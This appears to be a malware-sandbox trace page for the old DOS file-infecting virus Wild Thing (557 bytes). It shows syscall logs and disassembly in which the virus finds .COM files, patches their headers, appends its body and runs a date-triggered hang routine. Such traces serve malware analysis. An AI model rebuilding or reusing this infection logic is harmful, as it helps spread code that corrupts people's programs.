Sample viewer

vx.netlux.org/Virus.DOS.WildThing.557

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:11:38.75839692Z 26 PC: 12f84 | Set disk transfer address
2018-12-17T22:11:38.760524932Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32e], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x34a]
0x12e5b: int 0x21
0x12e5d: call 0x12f46
0x12e60: call 0x12f6a
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2cb]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a8]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2e1]
0x12e7f: mov ah, 0x3b
2018-12-17T22:11:38.763073225Z 71 PC: 12e5d | Get current directory
2018-12-17T22:11:38.766182771Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
0x12f4c: je 0x12f4f
0x12f4e: ret
0x12f4f: mov ah, 1
0x12f51: mov cx, 0x2020
0x12f54: int 0x10
0x12f56: mov ah, 2
0x12f58: xor dx, dx
0x12f5a: int 0x10
0x12f5c: xor ax, ax
0x12f5e: int 0x10
0x12f60: mov ah, 9
0x12f62: lea dx, word ptr [bp + 0x271]
0x12f66: int 0x21
0x12f68: jmp 0x12f68
0x12f6a: mov ah, 0x4e
0x12f6c: lea dx, word ptr [bp + 0x2d1]
0x12f70: mov cx, 7
0x12f73: int 0x21
0x12f75: jae 0x12f78
2018-12-17T22:11:38.770062345Z 78 PC: 12f75 | Find first file
2018-12-17T22:11:38.775849492Z 78 PC: 12e6e | Find first file
2018-12-17T22:11:38.781828478Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:38.801512973Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.106767922Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:11:39.113322753Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.116746241Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.124377849Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.125796718Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.132202294Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.134287633Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.142888131Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.145537251Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.154605702Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.164518136Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.167485869Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.174368608Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.184147431Z 61 PC: 12ec9 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:11:39.190581529Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.193220698Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.199968649Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.201628182Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.204883647Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.206564195Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.215321441Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.217482709Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.22535943Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.239139486Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.243925369Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.249984792Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.259959081Z 61 PC: 12ec9 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:11:39.272046625Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.275180923Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.28191653Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.283346196Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.286196872Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.287770693Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.296157996Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.298055007Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.305673678Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.315788699Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.318699017Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.324276636Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.3338074Z 61 PC: 12ec9 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:11:39.346766948Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.348475327Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.355200759Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.358359533Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.361024771Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.36306162Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.372242082Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.374407166Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.382251721Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.392424761Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.396175276Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.402082875Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.412429367Z 61 PC: 12ec9 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:11:39.420178269Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.421549914Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.427861049Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.429803638Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.432306408Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.433919844Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.4437674Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.445327358Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.458727829Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.46905089Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.471802359Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.478147931Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.488658598Z 61 PC: 12ec9 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:11:39.494837361Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.4960699Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.502894132Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.504361935Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.506955677Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.509237869Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.522865518Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.525048596Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.534645139Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.546111076Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.549044505Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.555912237Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.565758391Z 61 PC: 12ec9 | Open file (Filename = 'PAH.COM')
2018-12-17T22:11:39.572746729Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.57591742Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.582429051Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.583837119Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.586007028Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.587666313Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.594506504Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.596502323Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.602524654Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.610145247Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.612793812Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.616903016Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.624093347Z 61 PC: 12ec9 | Open file (Filename = 'TEST.COM')
2018-12-17T22:11:39.630454974Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.632211539Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.637407438Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.639716958Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.64552174Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.652804158Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.6556176Z 59 PC: 12e83 | Change current directory
2018-12-17T22:11:39.660108173Z 59 PC: 12e8d | Change current directory
2018-12-17T22:11:39.661732489Z 26 PC: 12f84 | Set disk transfer address
2018-12-17T22:11:39.663287231Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-17T22:11:41.861582864Z 72 PC: 8f1b9 | Allocate memory
2018-12-17T22:11:41.863619468Z 72 PC: 8f1bd | Allocate memory
2018-12-17T22:11:41.866977458Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-17T22:11:41.877753226Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-17T22:11:41.889517861Z 66 PC: 91f95 | Move file pointer
2018-12-17T22:11:41.891940838Z 62 PC: 91fc1 | Close file
2018-12-17T22:11:41.894494026Z 75 PC: 91fe0 | Execute program
2018-12-17T22:11:41.910470347Z 98 PC: 916f1 | Get current PSP
2018-12-17T22:11:41.911868679Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-17T22:11:41.91733679Z 48 PC: c609 | Get DOS version
2018-12-17T22:11:41.920594907Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-17T22:11:41.92363717Z 2 PC: c38c | Character output (Char = '32')
2018-12-17T22:11:41.925968312Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-17T22:11:41.929994655Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-17T22:11:41.933679091Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-17T22:11:41.938498037Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\SMARTDRV.EXE')
2018-12-17T22:11:41.950410593Z 66 PC: 91f95 | Move file pointer
2018-12-17T22:11:41.952034591Z 62 PC: 91fc1 | Close file
2018-12-17T22:11:41.954582714Z 75 PC: 91fe0 | Execute program
2018-12-17T22:11:41.96984287Z 98 PC: 916f1 | Get current PSP
2018-12-17T22:11:41.9732905Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-17T22:11:41.975151439Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:11:41.976155756Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:11:41.977476433Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:11:41.978998618Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:11:41.980116255Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-17T22:11:41.985076752Z 62 PC: 8f8eb | Close file
2018-12-17T22:11:41.986724029Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:41.995398332Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:41.996667511Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:41.99912222Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.000316057Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.001458761Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.004098525Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.005538747Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.007236294Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.010204547Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.012005584Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.013696853Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.022613099Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.024058539Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.025686741Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.028042716Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.029886991Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.031639393Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.034804578Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.036388718Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.038120863Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.041071948Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.042606474Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.044283166Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.046338852Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.048485455Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.050215713Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.053379733Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.054684Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.056107368Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.058492069Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-17T22:11:42.063149318Z 62 PC: 8f90e | Close file
2018-12-17T22:11:42.065125911Z 69 PC: 8f915 | Duplicate handle
2018-12-17T22:11:42.067165463Z 69 PC: 8f919 | Duplicate handle
2018-12-17T22:11:42.068450663Z 61 PC: 9387b | Open file (Filename = '')
2018-12-17T22:11:42.071946729Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-17T22:11:42.074149046Z 61 PC: 9387b | Open file (Filename = '')
2018-12-17T22:11:42.077655444Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-17T22:11:42.079105452Z 74 PC: 8f9c4 | Reallocate memory
2018-12-17T22:11:42.080683018Z 72 PC: 8f9e0 | Allocate memory
2018-12-17T22:11:42.081950511Z 72 PC: 8f9e4 | Allocate memory
2018-12-17T22:11:42.083316665Z 74 PC: 8f9fb | Reallocate memory
2018-12-17T22:11:42.084817227Z 72 PC: 8fa02 | Allocate memory
2018-12-17T22:11:42.086529119Z 72 PC: 8fa06 | Allocate memory
2018-12-17T22:11:42.088210475Z 73 PC: 8fa11 | Release memory
2018-12-17T22:11:42.089799115Z 73 PC: 8efea | Release memory
2018-12-17T22:11:42.090795049Z 74 PC: 8f003 | Reallocate memory
2018-12-17T22:11:42.093277441Z 72 PC: 8f054 | Allocate memory
2018-12-17T22:11:42.095269278Z 72 PC: 8f058 | Allocate memory
2018-12-17T22:11:42.097118808Z 73 PC: 8f060 | Release memory
2018-12-17T22:11:42.098861405Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-17T22:11:42.107905437Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:11:42.111747753Z 66 PC: 8f0ad | Move file pointer
2018-12-17T22:11:42.113898355Z 62 PC: 8f0d1 | Close file
2018-12-17T22:11:42.116183772Z 75 PC: 8f0f2 | Execute program
2018-12-17T22:11:42.136852646Z 80 PC: 12be9 | Set current PSP
2018-12-17T22:11:42.137715286Z 48 PC: 12bee | Get DOS version
2018-12-17T22:11:42.139729805Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-17T22:11:42.141639193Z 101 PC: 12c74 | Get extended country info
2018-12-17T22:11:42.142663669Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-17T22:11:42.144360723Z 74 PC: 12cdc | Reallocate memory
2018-12-17T22:11:42.145650937Z 72 PC: 1355d | Allocate memory
2018-12-17T22:11:42.147063697Z 25 PC: 13596 | Get default drive
2018-12-17T22:11:42.148550135Z 71 PC: 135ad | Get current directory
2018-12-17T22:11:42.150833281Z 59 PC: 135ba | Change current directory
2018-12-17T22:11:42.1554479Z 59 PC: 135c8 | Change current directory
2018-12-17T22:11:42.159040531Z 59 PC: 135d3 | Change current directory
2018-12-17T22:11:42.161286178Z 25 PC: 12d13 | Get default drive
2018-12-17T22:11:42.162862409Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-17T22:11:42.163873726Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:11:42.164746224Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:11:42.166966011Z 80 PC: 1301d | Set current PSP
2018-12-17T22:11:42.167805313Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-17T22:11:42.168831875Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:11:42.170289118Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:11:42.171321599Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-17T22:11:42.172564602Z 72 PC: 130ec | Allocate memory
2018-12-17T22:11:42.174679022Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-17T22:11:42.179404915Z 62 PC: 131ba | Close file
2018-12-17T22:11:42.181426012Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-17T22:11:42.183798077Z 74 PC: 1197c | Reallocate memory
2018-12-17T22:11:42.184955439Z 72 PC: 11991 | Allocate memory
2018-12-17T22:11:42.186263252Z 73 PC: 119b2 | Release memory
2018-12-17T22:11:42.188357618Z 72 PC: 119bd | Allocate memory
2018-12-17T22:11:42.189723611Z 73 PC: 119df | Release memory
2018-12-17T22:11:42.190807399Z 72 PC: 119f5 | Allocate memory
2018-12-17T22:11:42.192743462Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":2417,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:47.325261287Z 26 PC: 12f84 | Set disk transfer address
2018-12-25T11:45:47.327468816Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32e], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x34a]
0x12e5b: int 0x21
0x12e5d: call 0x12f46
0x12e60: call 0x12f6a
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2cb]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a8]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2e1]
0x12e7f: mov ah, 0x3b
2018-12-25T11:45:47.329553906Z 71 PC: 12e5d | Get current directory
2018-12-25T11:45:47.332236371Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
0x12f4c: je 0x12f4f
0x12f4e: ret
0x12f4f: mov ah, 1
0x12f51: mov cx, 0x2020
0x12f54: int 0x10
0x12f56: mov ah, 2
0x12f58: xor dx, dx
0x12f5a: int 0x10
0x12f5c: xor ax, ax
0x12f5e: int 0x10
0x12f60: mov ah, 9
0x12f62: lea dx, word ptr [bp + 0x271]
0x12f66: int 0x21
0x12f68: jmp 0x12f68
0x12f6a: mov ah, 0x4e
0x12f6c: lea dx, word ptr [bp + 0x2d1]
0x12f70: mov cx, 7
0x12f73: int 0x21
0x12f75: jae 0x12f78
2018-12-25T11:45:47.335026214Z 78 PC: 12f75 | Find first file
2018-12-25T11:45:47.347751295Z 78 PC: 12e6e | Find first file
2018-12-25T11:45:47.35334427Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T11:45:47.358724862Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T11:45:47.3747871Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:45:47.381530825Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T11:45:47.383223332Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:45:47.394703155Z 66 PC: 12f45 | Move file pointer
2018-12-25T11:45:47.396304837Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:45:47.399146937Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.40261854Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-25T11:45:47.410724354Z 87 PC: 12f2c | Get or set file date and time
2018-12-25T11:45:47.412282105Z 62 PC: 12f30 | Close file
2018-12-25T11:45:47.420630142Z 67 PC: 12f3a | Get or set file attributes
2018-12-25T11:45:47.431800105Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.434873078Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.441424119Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.451006644Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.457439522Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.458982474Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.465574976Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.466927699Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.469465141Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.471348916Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.479678399Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.481042402Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.489119214Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.499681604Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.502365021Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.509146428Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.519737736Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.527087682Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.530035186Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.536965263Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.538369741Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.542129768Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.544285275Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.552286041Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.553942717Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.562380643Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.572305718Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.574721897Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.581314859Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.590795034Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.597336509Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.59954399Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.605891318Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.607309994Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.611298911Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.613098334Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.621386099Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.624184762Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.631779367Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.641262731Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.644377877Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.649794359Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.659297578Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.666214195Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.667554821Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.673600748Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.675328802Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.677857567Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.679369122Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.688040189Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.689488548Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.69707151Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.707999293Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.710681206Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.716473282Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.727524404Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.734913478Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.73665954Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.7442206Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.745790215Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.748233753Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.7504813Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.759272678Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.760596636Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.768777648Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.778432933Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.781047082Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.78765834Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.797167358Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.808147075Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.810142279Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.816837876Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.818039394Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.821200197Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.822721381Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.830482624Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.832381974Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.839928681Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.849719595Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.853261787Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.859135159Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.868667831Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.880016292Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.882147105Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.888912922Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.89044038Z 62 PC: 12f30 | Close file (See above)
